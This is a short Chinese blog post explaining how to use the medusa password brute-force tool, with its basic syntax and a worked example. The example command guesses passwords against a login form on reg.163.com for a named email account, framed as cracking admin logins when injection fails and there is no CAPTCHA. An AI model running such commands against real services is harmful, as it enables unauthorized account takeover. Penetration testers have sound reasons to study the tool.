iverson5

【原创】3款在线端口爆破工具之medusa【整理】

作者:IversOn5

medusa(中文名:马杜萨)
这款工具的话,参数相对来说比较少,所以操作起来就相对简单比较少。

【原创】3款在线端口爆破工具之medusa【整理】 - IversOn5 - IversOn5 blog
以上就是medusa全部的模块。。感觉不是很多,对吧。

 用法很简单:medusa -h 目标IP -u 用户名 -p 密码 -M 待破解的协议
当-h为大写-H时,后面是目标IP文件哦。-u -p 都是以此类推。

---------------------------------------------------------------------------------
登陆表单的破解
我们在碰到一些后台登陆地址的时候,有时候可能会没有注入出密码,但是后台登陆又没有验证码,这个时候我们就可以利用medusa来爆破账号密码咯

medusa -d                             //查看模块
medusa -M  web-form  -q       //查看模块web-form详细信息

medusa -h  reg.163.com -M web-form -m FORM:"/logins.jsp"   -m DENY-SIGNAL:"对不起,您的密码不正确" -m FORM-DATA:"post?username=&password=&submit=True" -u wakevol@163.com -P /home/evol/soft/passwd                               

/* -h 目的地址 */  /* -M 模块 */  /*-m  FORM:"表单地址" */  /* -m DENY-SIGNAL:"错误返回信息 " */

/* -m FORM-DATA:"post?username=&password=&submit=True"  看源码,获取用户名和密码id*/

评论

iverson5

© iverson5 | Powered by LOFTER